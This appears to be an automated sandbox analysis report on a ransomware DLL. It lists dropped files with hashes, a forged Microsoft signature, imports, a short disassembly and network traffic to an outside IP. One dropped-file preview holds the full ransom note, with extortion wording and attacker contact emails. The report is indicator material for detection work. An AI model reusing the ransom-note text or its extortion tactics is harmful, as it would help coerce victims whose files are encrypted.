                                                                                                    Entropy (8bit):7.2006835162062774
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:6:bKKrWdrC8+CLXzoSkl1RTLbT2UmxzL/EdaRCdT16wmn:0rCazil1RT6UGzDEwRXZn
                                                                                                    MD5:F1FC38A066E4E755C6D40EBBAD55CCA3
                                                                                                    SHA1:E33022ACD73032953F5B2324C6A3F5BC9246105F
                                                                                                    SHA-256:806BF00798944736F4FF7E905F50108B3CB1BE08406EA7F302BCC71E79BA3344
                                                                                                    SHA-512:B3B542DDF29D1F2B1913EEF6373E5C7B74626214FC5F3787390AF3D4EB22D9A3BA02FC823C2592B059AB31DF9D1251F733EBE6169DE70C1F31B420FA6DA13EF6
                                                                                                    Malicious:false
                                                                                                    Preview:......l...+..D.N6.S.>.:.....3;.bi&.)oTPy>F.1.E......o.Y.......AT...;..R9. ..Y....ii..@.N.a.+c.{(g......Ue....+.O....-F].3.$.#...d.=.-<z..n$...`..J.T...A......s5a.ey..4wZZd......q...l..R.L./{X..)..m..%+.{.*Q.?7(.,.x.}_...=.?...\..7tv.8...#.F.FZ.40xABADCABA
                                                                                                    Process:C:\Users\user\AppData\Local\Temp\eryy65ty.exe
                                                                                                    File Type:data
                                                                                                    Category:dropped
                                                                                                    Size (bytes):1125
                                                                                                    Entropy (8bit):7.858210266281039
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:24:oXaT6TJevM8qULDwc2+oxgeUO8OhbzaI9Qh6odEWgCZSCnH:oXSU8vLDSKeyOxeoQsGE8dH
                                                                                                    MD5:24B6D657278473766860F0DE5786E30E
                                                                                                    SHA1:FF6F939D606C94D9F07E5B33EC12F388F5E60695
                                                                                                    SHA-256:B815616294795C4FCCCD00644DFD4AE86D9587030EBE556312522C5E3D347E90
                                                                                                    SHA-512:97CF914C71C6285139CFA4C0C45477060C87B983029A042D5262A47F1DB3D79B228E07F553B464910D283002CB37B1CF8B5D381A8B41A91C9F323B28C2C7D2D1
                                                                                                    Malicious:false
                                                                                                    Preview:..[O..i....h.^:6.@...9.VJq..6G..uW^...I_..y;..N.)),..%..Y..'!S..4..=#.m.n.+`].&G(..rp.....&."SWK.Td38(t-D.1...^..9..6....>.u...-C.F.....x.,....D.a...V....i.>..?.V..C._.<.m.).b=.....v........c)./...z=.'b..7.......y......%.....C.XlBCQ.kd''.Q...E........_J~.X...b!.......>ahH.J......i?....5G.\.....`...8..0...4a...C..G$....n&.&.#ZQ.G...X.8......:.q5.'WX.e.>dR{...Z.......~"1[... ..[6.q.Z..@)..Q8..U.y.k.....u.N.V.......n....2P"aN.@..#..1....o14..k.}.Ag....s......zE.dd.:..Z0.....r]..C..w.+...!...0...o.Yi.<...G..I...[....~..6....$.t..q..B..O...qY........Q`Hf.k`.F.5..(NZ\...G.T.s.."..W...A.....4\hY....%^...j.@..3'."i../.;...HK..=..`.......g:&It.n....I....^BY...2(.{8v.G.5...4.....*.....j?.._.........F!.d.:..7G.....R.u1....y&Pq.8....l..1..9D>......"..]..l..<.g...<.T..b.x..}.......j..S.............1.^.....;jescription>oG...fgu...%K....'./..}....'..Qaw.F.6.Y@.*nA...u......KP-#.~.]]........'..[.4@....n.....u.1.P@n.~.Z|..(.9<|7.A&c..B ......d..4.hr...
                                                                                                    Process:C:\Users\user\AppData\Local\Temp\eryy65ty.exe
                                                                                                    File Type:data
                                                                                                    Category:dropped
                                                                                                    Size (bytes):1125
                                                                                                    Entropy (8bit):7.858210266281039
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:24:oXaT6TJevM8qULDwc2+oxgeUO8OhbzaI9Qh6odEWgCZSCnH:oXSU8vLDSKeyOxeoQsGE8dH
                                                                                                    MD5:24B6D657278473766860F0DE5786E30E
                                                                                                    SHA1:FF6F939D606C94D9F07E5B33EC12F388F5E60695
                                                                                                    SHA-256:B815616294795C4FCCCD00644DFD4AE86D9587030EBE556312522C5E3D347E90
                                                                                                    SHA-512:97CF914C71C6285139CFA4C0C45477060C87B983029A042D5262A47F1DB3D79B228E07F553B464910D283002CB37B1CF8B5D381A8B41A91C9F323B28C2C7D2D1
                                                                                                    Malicious:false
                                                                                                    Process:C:\Users\user\AppData\Local\Temp\eryy65ty.exe
                                                                                                    File Type:ASCII text, with very long lines (3354), with CRLF line terminators
                                                                                                    Category:dropped
                                                                                                    Size (bytes):4165
                                                                                                    Entropy (8bit):4.7937259680287445
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:96:cvNlHaKqHidscvSYvVzlCPuVVmzOr1zVfVWeAKlxmrzw+19LQZnnQyaJz:Qn6FH4FSYvt3VVNf1AKPW94noz
                                                                                                    MD5:35D820B5FDA58F016DD2B981D94774E6
                                                                                                    SHA1:6A4293721CDD28A40EEDBA4494C5740FC35F0A35
                                                                                                    SHA-256:DD387FB83D77B016B7D12ED10C1789DF40A5ED3DF550CC077A99EC9A718ACCE5
                                                                                                    SHA-512:D6B3C70C763091115779F13552D51B17562F07CA0A49CB2ED6513DD2A09BD985301D34D36CBF4CEC407556A71D55A082485CA01CB75B1E84B23D8D1E850D5F7F
                                                                                                    Malicious:false
                                                                                                    Preview:ATTENTION!....Don't worry, you can return your files! ..All your files like photos, videos and other important documents are encrypted with a strong encryption algorithm and unique key...The only method of recovering files is to purchase a decrypt tool and your key...Do not try to recover your files without a decrypt tool, you may damage them making them impossible to recover....we advise you contact us in less than 72 hours, otherwise there is a possibility that your files will never be returned...We will not wait for your letter for a long time, mail can be abused, we are moving on, hurry up with the decision.....Check your email 'Spam' or 'Junk' foeder if you don't get answer within 6 hours.....Contact us..email :edfr789@tutanota.com.. -> edfr789@tutamail.com..Attach this file in the email...ID :F78F1863323E95490AE92489C8E02518C74648535F178704204F5E9DFE97B742486FBA33CD24C4A63712BD2D89E72D4A7DA05B86139BC1B10797173A61FD652211153D409E07F9C7F21A43204824743265021B282447E114CE08D23585C
                                                                                                    Process:C:\Users\user\AppData\Local\Temp\eryy65ty.exe
                                                                                                    File Type:OpenPGP Secret Key
                                                                                                    Category:dropped
                                                                                                    Size (bytes):292
                                                                                                    Entropy (8bit):7.171682500717397
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:6:6xY12u3EMsrxPnlD5GyRUM8sIyLxiBKQelAACRMiDgQxhs8w6Zn:0NMsrxPZ5dbzvENelAbRMi4In
                                                                                                    MD5:74503A264DD2824E1FEC9114316411AB
                                                                                                    SHA1:C36AB72628A98A9E34EF7186FABB0EA2C73EBC78
                                                                                                    SHA-256:5BA7DA34E078C5A2D8B869618005226F705631ACE4C04704F37BE1F3AFCF28D7
                                                                                                    SHA-512:2071380EEAF31264B3F7B41D945FCA12AA20067F78E1A68A506DD41114E50EE611D714AFCE697928FA3804A49DAEC88019AD927D0CFEFF13308856AA6467E557
                                                                                                    Malicious:false
                                                                                                    Preview:........t.....4...........o..\../0K..^{..P..y..Km.i..T......O/=...!e..w..z....D.m.:72b.....E.....$..K.i]. ....&..c)..F....#...G.......&...f.V,....>:"....y4._./..<:.....4..=(....t.e<..z....H."...-..t.{..+V.2....Hi...}..4,9....X.S.8.'..L..Y.y!.r-.w....2i..4S...p...f 0xABADCABA
                                                                                                    Process:C:\Users\user\AppData\Local\Temp\eryy65ty.exe
                                                                                                    File Type:data
                                                                                                    Category:dropped
                                                                                                    Size (bytes):266
                                                                                                    Entropy (8bit):7.128745817297379
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:6:QfJENis/dmyaNkaavZOsz9XvgTthdVpv2KzfxUHn:Qf6TmyoaROsz9XvU/d2SfCHn
                                                                                                    MD5:69A2735FA26CC9FC0432CD7F261D01B3
                                                                                                    SHA1:B778A150EECAEDEED9DE8274571C0F031362108C
                                                                                                    SHA-256:3A632D29524FFA4D2D2A654B8EC8743C78A988FD69D2C5160792484E4A6BB78A
                                                                                                    SHA-512:324612A73F454540EFFF648CA5E946FC225D50B44A21C209356D4898B7F7ACA40053784CFC97C7F12307CDF05A16F3A96E0CCEA952CE0EBC47422F506A336966
                                                                                                    Malicious:false
                                                                                                    Preview:t..y....>F^.pub.J!.>..^w.Br.....,A....U...k....9..3........oRLx.(@zT..w*G.o..5..Y...K..i..]y.y.?`.....C...._..P.G...B.R..lZ...b...7..</......Nv.).L..<..e.../=..?...(...........:.x.o,.xf.p...4.L.<.{...E.ga..$"..../.T.3.9)....HY.[+.5{.).Y.J5.;0xABADCABA
                                                                                                    Process:C:\Users\user\AppData\Local\Temp\eryy65ty.exe
                                                                                                    File Type:data
                                                                                                    Category:dropped
                                                                                                    Size (bytes):266
                                                                                                    Entropy (8bit):7.26130643733061
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:6:oWD1t0LRS7zGWqtMe7GcG1cCur5/nkFWmJNVpD94RkSn:oWptYRSPGWUMe7GcGbur5/nkFjJZiRkS
                                                                                                    MD5:E65FF033840B89F9C43C27ECBAAE9C6E
                                                                                                    SHA1:FCD5E803DB10429742F804A1752258D3ECFC9D1C
                                                                                                    SHA-256:43E46DCACF62243842402E1D90F30795FB2359A9475E1B5CABF8CBE586A6825B
                                                                                                    SHA-512:10F617F6D553E5D7679009B8D3425E1543DEE674C8DFFA100B8A37DC4E3B3378C183D48360176038EDCC18EF387B2F3EC485CA834E46A01243D4723DF4C459E8
                                                                                                    Malicious:false
                                                                                                    Preview:.G^.rI.E..{...>. ....@........`...o.G.G..wb.g.fQ|'0.I[G.....|\.f....T..%....a.*_.x ..B...d..Zr7..u...D..$....H.*..i.]............k......;Z.5....Q.$(...f.....!....M2...>..1...Y.......y.s.[.T.Nz..?...../u..E.d.'oh..R2K..._..K.69..3Z..~%.. J0.8..j0xABADCABA
                                                                                                    Process:C:\Users\user\AppData\Local\Temp\eryy65ty.exe
                                                                                                    File Type:data
                                                                                                    Category:dropped
                                                                                                    Size (bytes):266
                                                                                                    Entropy (8bit):7.177229264486248
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:6:LNWfghPM32iCMLKwTLuTaHzxc7bOMXicLlPw7R+Dn:pIghPMmSATmxFEiiPw7Rin
                                                                                                    MD5:587F3992E0EF07BC3F4DDA90A3A75997
                                                                                                    SHA1:D9AEB6E3B1AD4683BFABE1D830BCAD6D16A5CD4C
                                                                                                    SHA-256:4E3AD022276AAC8EF1BF7B50EC6DE45F6FB0DBEBA9E809FB1E1D6C65BCA6C5AB
                                                                                                    SHA-512:C88DB0B5FB5339AEA8F18BE8D01CA93FF75BDA4C7B11DC1940D08443701E3098E08AC76B6D93F2ABB84374BC08AA71A45E542A67A8F9630401E9E5CF447B66C4
                                                                                                    Malicious:false
                                                                                                    Preview:....@R.....Q....il......?.3:)-G8..3..nF..T..5..6".$..BB....r.%.a.b....(0..|];.vd.q.r...Sx........RM...G..f^...S,gX.Zx[...c>5M..{wY..:..r.&..Y..+.$..<..\TL...3j...0..LiQ.."K.(.5.....j...B./.,....9.../b6[....^...w._..g*..Mj....64........q.c.(*.+}0xABADCABA
                                                                                                    Process:C:\Users\user\AppData\Local\Temp\eryy65ty.exe
                                                                                                    File Type:data
                                                                                                    Category:modified
                                                                                                    Size (bytes):266
                                                                                                    Entropy (8bit):7.1174543226445515
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:6:o9beglqlZkmy8aWnmHU66gtABfSfdSVhYtMa9kHdxSn:Oygklymn3z6papS1SLYtB9kzSn
                                                                                                    MD5:7E7D217F94FD16061238A9CB44F15050
                                                                                                    SHA1:40301542B102DB6F205DDFF238B34089D23CCD34
                                                                                                    SHA-256:184FAC6DE7822E9774CFDB15899C28D12E23CB172215266DE521FCD93D1C7ED0
                                                                                                    SHA-512:08944E78E2D8D464195D810C460799542DE90DDC1E0E83AE84861CA012DB8DBCA49474CADED3AADC10FC292251D28CA7D5B43DDB2CF8EFF965F108698ED2DE89
                                                                                                    Malicious:false
                                                                                                    Preview:...hC(../.c=.....%......z...........Y..n>Z@>z.q...Ik>z..6..T.....-......N>/},}.!.:e.Z...jr.KHz.r/.Z. :4..yB..;..#.....Ml0#.......9.....6..e.x.:.y.4...e.}.......2X.)X$...8.cL3"6_.....C.;....+.-.u!...*E..1[:X/.j..F..&R....H....6...c.&.t x.2.G....0xABADCABA
                                                                                                    Process:C:\Users\user\AppData\Local\Temp\eryy65ty.exe
                                                                                                    File Type:data
                                                                                                    Category:dropped
                                                                                                    Size (bytes):286
                                                                                                    Entropy (8bit):7.2182717529200495
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:6:mda3XG+DpH0Jp2L4wbmEf/yDIAUTl5GSa2tmUrH0vcY0/n:msG+e2zmEuIXTvGn2t3rUvUn
                                                                                                    MD5:6C705D373BFEC757FE87144DE4B39085
                                                                                                    SHA1:C9D62B566C2FFA6E1B5B024BBC3156E9FDBA8CF5
                                                                                                    SHA-256:8AD66DF63B3B06A92EEEA90D7F4AFDAE68352F738F89A90E03B9B9AE8CCAA848
                                                                                                    SHA-512:8D91971336B9E2BBF950FF2FC74A9E0B10C0CCDDD7C6128C79799FDDBBC5CEBBBA208B814DA07F6E06E14E0CB0E79399BB8CE5F232A1D00C7FED0CCB35110D56
                                                                                                    Malicious:false
                                                                                                    Preview:v....=.......i........y.&2.....+..}q....l....+;..$.u...e.fU:g.o......De..........[.....x...!........g.-..B.f.mz....z....%..7..mQ...~.N+..C........`....=.'....._.R4...a.....nbu;....5l.%43....Qe..!t]xx}......g. 9.7...6x..d...#8"..y.^NU..gs".#~.&7.q.M..^.'........0xABADCABA
                                                                                                    Process:C:\Users\user\AppData\Local\Temp\eryy65ty.exe
                                                                                                    File Type:data
                                                                                                    Category:dropped
                                                                                                    Size (bytes):286
                                                                                                    Entropy (8bit):7.2182717529200495
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:6:mda3XG+DpH0Jp2L4wbmEf/yDIAUTl5GSa2tmUrH0vcY0/n:msG+e2zmEuIXTvGn2t3rUvUn
                                                                                                    MD5:6C705D373BFEC757FE87144DE4B39085
                                                                                                    SHA1:C9D62B566C2FFA6E1B5B024BBC3156E9FDBA8CF5
                                                                                                    SHA-256:8AD66DF63B3B06A92EEEA90D7F4AFDAE68352F738F89A90E03B9B9AE8CCAA848
                                                                                                    SHA-512:8D91971336B9E2BBF950FF2FC74A9E0B10C0CCDDD7C6128C79799FDDBBC5CEBBBA208B814DA07F6E06E14E0CB0E79399BB8CE5F232A1D00C7FED0CCB35110D56
                                                                                                    Malicious:false
                                                                                                    Preview:v....=.......i........y.&2.....+..}q....l....+;..$.u...e.fU:g.o......De..........[.....x...!........g.-..B.f.mz....z....%..7..mQ...~.N+..C........`....=.'....._.R4...a.....nbu;....5l.%43....Qe..!t]xx}......g. 9.7...6x..d...#8"..y.^NU..gs".#~.&7.q.M..^.'........0xABADCABA
                                                                                                    Process:C:\Windows\System32\wbem\WMIC.exe
                                                                                                    File Type:ASCII text, with CRLF, CR line terminators
                                                                                                    Category:dropped
                                                                                                    Size (bytes):48
                                                                                                    Entropy (8bit):4.305255793112395
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:3:8yzGc7C1RREal:nzGtRV
                                                                                                    MD5:6ED2062D4FB53D847335AE403B23BE62
                                                                                                    SHA1:C3030ED2C3090594869691199F46BE7A9A12E035
                                                                                                    SHA-256:43B5390113DCBFA597C4AAA154347D72F660DB5F2A0398EB3C1D35793E8220B9
                                                                                                    SHA-512:C9C302215394FEC0B38129280A8303E0AF46BA71B75672665D89828C6F68A54E18430F953CE36B74F50DC0F658CA26AC3572EA60F9E6714AFFC9FB623E3C54FC
                                                                                                    Malicious:false
                                                                                                    Preview:ERROR:...Description = Initialization failure...
                                                                                                    Process:C:\Windows\SysWOW64\PING.EXE
                                                                                                    File Type:ASCII text, with CRLF line terminators
                                                                                                    Category:dropped
                                                                                                    Size (bytes):283
                                                                                                    Entropy (8bit):4.84674468132717
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:6:PzXULmWxHLTpUrU4wUsW3CNcwAFeMmvVOIHJFxMVlmJHaVFrIW1IrIW83Wy:P+pTpcU4nsTDAFSkIrxMVlmJHaVtr1eq
                                                                                                    MD5:38A6ED2824540859D2923148B0B1E0E1
                                                                                                    SHA1:3F99ADE9E9E545F56766083B437D956C4557D3A2
                                                                                                    SHA-256:CCB4CA9180D0A3BA685602EC69270BAD1C98D87C8D6D949AC4BE95FF719DA7B7
                                                                                                    SHA-512:C8B8BB9366862459513610A3E4EABA0DF37E1390ED47AAF92BBCB1375C92AFCA0E8A16423F953B53B25F4A533AFE569E0ACA77D2F57777D3BCAC44D15C70A7E7
                                                                                                    Malicious:false
                                                                                                    Preview:..Pinging 1.1.1.1 with 32 bytes of data:..Reply from 1.1.1.1: bytes=32 time=136ms TTL=55....Ping statistics for 1.1.1.1:.. Packets: Sent = 1, Received = 1, Lost = 0 (0% loss),..Approximate round trip times in milli-seconds:.. Minimum = 136ms, Maximum = 136ms, Average = 136ms..
                                                                                                    File type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                                                    Entropy (8bit):6.682260957753181
                                                                                                    TrID:
                                                                                                    • Win32 Dynamic Link Library (generic) (1002004/3) 99.60%
                                                                                                    • Generic Win/DOS Executable (2004/3) 0.20%
                                                                                                    • DOS Executable Generic (2002/1) 0.20%
                                                                                                    • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
                                                                                                    File name:TD2HjoogPx.dll
                                                                                                    File size:211'656 bytes
                                                                                                    MD5:fccd129f6a5b9d2133d14922a3614f02
                                                                                                    SHA1:e814c637e6f0c21f3aa9b43fb92cb161b4d451fc
                                                                                                    SHA256:4b4a87552c44158fb53a72c7294319b0ddde9f99f460425ad5997d3b9121cd1e
                                                                                                    SHA512:c1594504053bbe2b061880d1ff69819eca8bdd2bc882b74f415ff8a1515389e32b8d7cd1b931d65b042247fd05df1751a000d6da4219427b74e9cdb0e0e52979
                                                                                                    SSDEEP:3072:4pEegLluZoATP/QGdqlhNFIkiFnZDJVvU1nSXZOAg0Fuj0pJgOgpQkV+tpMEaE:4pDyp2AQq3FWFnRehAOXpQkY7MY
                                                                                                    TLSH:93249E007092C172D67F16380979EAA3597DBD110FB489EF67E49E3D4E742C09B32AB6
                                                                                                    File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......q.B.5.,.5.,.5.,.F./.8.,.F.)...,.F.(.#.,.g.(.:.,.g./. .,.g.).p.,.F.-.6.,.5.-.J.,...%.7.,.....4.,.....4.,.Rich5.,................
                                                                                                    Icon Hash:7ae282899bbab082
                                                                                                    Entrypoint:0x10007e76
                                                                                                    Entrypoint Section:.text
                                                                                                    Digitally signed:true
                                                                                                    Imagebase:0x10000000
                                                                                                    Subsystem:windows gui
                                                                                                    Image File Characteristics:EXECUTABLE_IMAGE, 32BIT_MACHINE, DLL
                                                                                                    DLL Characteristics:DYNAMIC_BASE, NX_COMPAT
                                                                                                    Time Stamp:0x675CC3E0 [Fri Dec 13 23:31:44 2024 UTC]
                                                                                                    TLS Callbacks:
                                                                                                    CLR (.Net) Version:
                                                                                                    OS Version Major:6
                                                                                                    OS Version Minor:0
                                                                                                    File Version Major:6
                                                                                                    File Version Minor:0
                                                                                                    Subsystem Version Major:6
                                                                                                    Subsystem Version Minor:0
                                                                                                    Import Hash:92a54d40c8888508df24cd0849339951
                                                                                                    Signature Valid:false
                                                                                                    Signature Issuer:CN=Microsoft Windows Production PCA 2011, O=Microsoft Corporation, L=Redmond, S=Washington, C=US
                                                                                                    Signature Validation Error:The digital signature of the object did not verify
                                                                                                    Error Number:-2146869232
                                                                                                    Not Before, Not After
                                                                                                    • 16/11/2023 20:20:09 14/11/2024 20:20:09
                                                                                                    Subject Chain
                                                                                                    • CN=Microsoft Windows, O=Microsoft Corporation, L=Redmond, S=Washington, C=US
                                                                                                    Version:3
                                                                                                    Thumbprint MD5:9B7554FFA2D97FE692CB10D7B2E315A7
                                                                                                    Thumbprint SHA-1:D8FB0CC66A08061B42D46D03546F0D42CBC49B7C
                                                                                                    Thumbprint SHA-256:2D7FFCE2C256016291B67285456AA8DA779D711BBF8E6B85C212A157DDFBE77E
                                                                                                    Serial:3300000460CF42A912315F6FB3000000000460
                                                                                                    Instruction
                                                                                                    push ebp
                                                                                                    mov ebp, esp
                                                                                                    cmp dword ptr [ebp+0Ch], 01h
                                                                                                    jne 00007F1CFCC2FA17h
                                                                                                    call 00007F1CFCC30170h
                                                                                                    push dword ptr [ebp+10h]
                                                                                                    push dword ptr [ebp+0Ch]
                                                                                                    push dword ptr [ebp+08h]
                                                                                                    call 00007F1CFCC2F8C3h
                                                                                                    add esp, 0Ch
                                                                                                    pop ebp
                                                                                                    retn 000Ch
                                                                                                    int3
                                                                                                    int3
                                                                                                    int3
                                                                                                    int3
                                                                                                    int3
                                                                                                    int3
                                                                                                    int3
                                                                                                    push esi
                                                                                                    mov eax, dword ptr [esp+14h]
                                                                                                    or eax, eax
                                                                                                    jne 00007F1CFCC2FA3Ah
                                                                                                    mov ecx, dword ptr [esp+10h]
                                                                                                    mov eax, dword ptr [esp+0Ch]
                                                                                                    xor edx, edx
                                                                                                    div ecx
                                                                                                    mov ebx, eax
                                                                                                    mov eax, dword ptr [esp+08h]
                                                                                                    div ecx
                                                                                                    mov esi, eax
                                                                                                    mov eax, ebx
                                                                                                    mul dword ptr [esp+10h]
                                                                                                    mov ecx, eax
                                                                                                    mov eax, esi
                                                                                                    mul dword ptr [esp+10h]
                                                                                                    add edx, ecx
                                                                                                    jmp 00007F1CFCC2FA59h
                                                                                                    mov ecx, eax
                                                                                                    mov ebx, dword ptr [esp+10h]
                                                                                                    mov edx, dword ptr [esp+0Ch]
                                                                                                    mov eax, dword ptr [esp+08h]
                                                                                                    shr ecx, 1
                                                                                                    rcr ebx, 1
                                                                                                    shr edx, 1
                                                                                                    rcr eax, 1
                                                                                                    or ecx, ecx
                                                                                                    jne 00007F1CFCC2FA06h
                                                                                                    div ebx
                                                                                                    mov esi, eax
                                                                                                    mul dword ptr [esp+14h]
                                                                                                    mov ecx, eax
                                                                                                    mov eax, dword ptr [esp+10h]
                                                                                                    mul esi
                                                                                                    add edx, ecx
                                                                                                    jc 00007F1CFCC2FA20h
                                                                                                    cmp edx, dword ptr [esp+0Ch]
                                                                                                    jnbe 00007F1CFCC2FA1Ah
                                                                                                    jc 00007F1CFCC2FA21h
                                                                                                    cmp eax, dword ptr [esp+08h]
                                                                                                    jbe 00007F1CFCC2FA1Bh
                                                                                                    dec esi
                                                                                                    sub eax, dword ptr [esp+10h]
                                                                                                    sbb edx, dword ptr [esp+14h]
                                                                                                    xor ebx, ebx
                                                                                                    sub eax, dword ptr [esp+08h]
                                                                                                    sbb edx, dword ptr [esp+0Ch]
                                                                                                    neg edx
                                                                                                    neg eax
                                                                                                    sbb edx, 00000000h
                                                                                                    mov ecx, edx
                                                                                                    mov edx, ebx
                                                                                                    mov ebx, ecx
                                                                                                    mov ecx, eax
                                                                                                    mov eax, esi
                                                                                                    pop esi
                                                                                                    retn 0010h
                                                                                                    push ebp
                                                                                                    mov ebp, esp
                                                                                                    mov eax, dword ptr [ebp+08h]
                                                                                                    push esi
                                                                                                    mov ecx, dword ptr [eax+00h]
Name                                  Virtual Address  Virtual Size  Is in Section
IMAGE_DIRECTORY_ENTRY_EXPORT          0x0              0x0
IMAGE_DIRECTORY_ENTRY_IMPORT          0x2e7f0          0x28          .rdata
IMAGE_DIRECTORY_ENTRY_RESOURCE        0x31000          0xf8          .rsrc
IMAGE_DIRECTORY_ENTRY_EXCEPTION       0x0              0x0
IMAGE_DIRECTORY_ENTRY_SECURITY        0x31200          0x28c8
IMAGE_DIRECTORY_ENTRY_BASERELOC       0x32000          0x1cd4        .reloc
IMAGE_DIRECTORY_ENTRY_DEBUG           0x2c890          0x70          .rdata
IMAGE_DIRECTORY_ENTRY_COPYRIGHT       0x0              0x0
IMAGE_DIRECTORY_ENTRY_GLOBALPTR       0x0              0x0
IMAGE_DIRECTORY_ENTRY_TLS             0x0              0x0
IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG     0x2c900          0x40          .rdata
IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT    0x0              0x0
IMAGE_DIRECTORY_ENTRY_IAT             0x21000          0x138         .rdata
IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT    0x0              0x0
IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR  0x0              0x0
IMAGE_DIRECTORY_ENTRY_RESERVED        0x0              0x0
Name    Virtual Address  Virtual Size  Raw Size  MD5                               Xored PE  ZLIB Complexity      File Type                                                          Entropy             Characteristics
.text   0x1000           0x1ffb6       0x20000   ccf9e63d329795c42d446d0392b4eb4d  False     0.5694808959960938   data                                                               6.652246632685236   IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
.rdata  0x21000          0xdef2        0xe000    a432f9197d6edfb5169c5b68d3c2f991  False     0.515625             data                                                               5.61481294452055    IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.data   0x2f000          0x1d10        0xe00     fca075005d4259ffb8e9d24d7e3777be  False     0.21372767857142858  DOS executable (block device driver @\273\,32-bit sector-support)  3.4018737889891533  IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.rsrc   0x31000          0xf8          0x200     6c05a5ed75084ca5adb89c00a585b8af  False     0.3359375            data                                                               2.5312981004807127  IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.reloc  0x32000          0x1cd4        0x1e00    eb54c12eb7ad3d4d3441346ea94f74a6  False     0.733203125          data                                                               6.5115450953985565  IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ
Name         RVA      Size  Type                                                     Language  Country        ZLIB Complexity
RT_MANIFEST  0x31060  0x91  XML 1.0 document, ASCII text, with CRLF line terminators  English   United States  0.8689655172413793
DLL           Import
KERNEL32.dll  CreateProcessW, GetLastError, WaitForSingleObject, CloseHandle, Sleep, CreateFileW, QueryPerformanceCounter, QueryPerformanceFrequency, WideCharToMultiByte, InitializeCriticalSectionEx, GetSystemTimeAsFileTime, GetModuleHandleW, GetProcAddress, EnterCriticalSection, LeaveCriticalSection, DeleteCriticalSection, EncodePointer, DecodePointer, MultiByteToWideChar, LCMapStringEx, GetStringTypeW, GetCPInfo, UnhandledExceptionFilter, SetUnhandledExceptionFilter, GetCurrentProcess, TerminateProcess, IsProcessorFeaturePresent, GetCurrentProcessId, GetCurrentThreadId, InitializeSListHead, IsDebuggerPresent, GetStartupInfoW, RtlUnwind, RaiseException, InterlockedFlushSList, SetLastError, InitializeCriticalSectionAndSpinCount, TlsAlloc, TlsGetValue, TlsSetValue, TlsFree, FreeLibrary, LoadLibraryExW, ExitProcess, GetModuleHandleExW, GetModuleFileNameA, HeapFree, HeapAlloc, GetACP, GetStdHandle, GetFileType, LCMapStringW, GetLocaleInfoW, IsValidLocale, GetUserDefaultLCID, EnumSystemLocalesW, FlushFileBuffers, WriteFile, GetConsoleCP, GetConsoleMode, ReadFile, ReadConsoleW, SetFilePointerEx, HeapReAlloc, FindClose, FindFirstFileExA, FindNextFileA, IsValidCodePage, GetOEMCP, GetCommandLineA, GetCommandLineW, GetEnvironmentStringsW, FreeEnvironmentStringsW, GetProcessHeap, SetStdHandle, HeapSize, WriteConsoleW
Language of compilation system  Country where language is spoken  Map
English                         United States
Timestamp  Source Port  Dest Port  Source IP  Dest IP
                                                                                                    Dec 15, 2024 09:27:37.562235117 CET4434970645.125.67.168192.168.2.8
                                                                                                    Dec 15, 2024 09:27:37.562254906 CET49706443192.168.2.845.125.67.168
                                                                                                    Dec 15, 2024 09:27:37.562279940 CET4434970645.125.67.168192.168.2.8
                                                                                                    Dec 15, 2024 09:27:37.562299967 CET49706443192.168.2.845.125.67.168
                                                                                                    Dec 15, 2024 09:27:37.562316895 CET49706443192.168.2.845.125.67.168
                                                                                                    Dec 15, 2024 09:27:37.570745945 CET4434970645.125.67.168192.168.2.8
                                                                                                    Dec 15, 2024 09:27:37.570805073 CET4434970645.125.67.168192.168.2.8
                                                                                                    Dec 15, 2024 09:27:37.570832014 CET49706443192.168.2.845.125.67.168
                                                                                                    Dec 15, 2024 09:27:37.570856094 CET4434970645.125.67.168192.168.2.8
                                                                                                    Dec 15, 2024 09:27:37.570884943 CET49706443192.168.2.845.125.67.168
                                                                                                    Dec 15, 2024 09:27:37.570904970 CET49706443192.168.2.845.125.67.168
                                                                                                    Dec 15, 2024 09:27:37.577312946 CET4434970645.125.67.168192.168.2.8
                                                                                                    Dec 15, 2024 09:27:37.577366114 CET4434970645.125.67.168192.168.2.8
                                                                                                    Dec 15, 2024 09:27:37.577387094 CET49706443192.168.2.845.125.67.168
                                                                                                    Dec 15, 2024 09:27:37.577408075 CET4434970645.125.67.168192.168.2.8
                                                                                                    Dec 15, 2024 09:27:37.577434063 CET49706443192.168.2.845.125.67.168
                                                                                                    Dec 15, 2024 09:27:37.577446938 CET49706443192.168.2.845.125.67.168
                                                                                                    Dec 15, 2024 09:27:37.584625959 CET4434970645.125.67.168192.168.2.8
                                                                                                    Dec 15, 2024 09:27:37.584675074 CET4434970645.125.67.168192.168.2.8
                                                                                                    Dec 15, 2024 09:27:37.584722996 CET49706443192.168.2.845.125.67.168
                                                                                                    Dec 15, 2024 09:27:37.584747076 CET4434970645.125.67.168192.168.2.8
                                                                                                    Dec 15, 2024 09:27:37.584760904 CET49706443192.168.2.845.125.67.168
                                                                                                    Dec 15, 2024 09:27:37.584784985 CET49706443192.168.2.845.125.67.168
                                                                                                    Dec 15, 2024 09:27:37.591511965 CET4434970645.125.67.168192.168.2.8
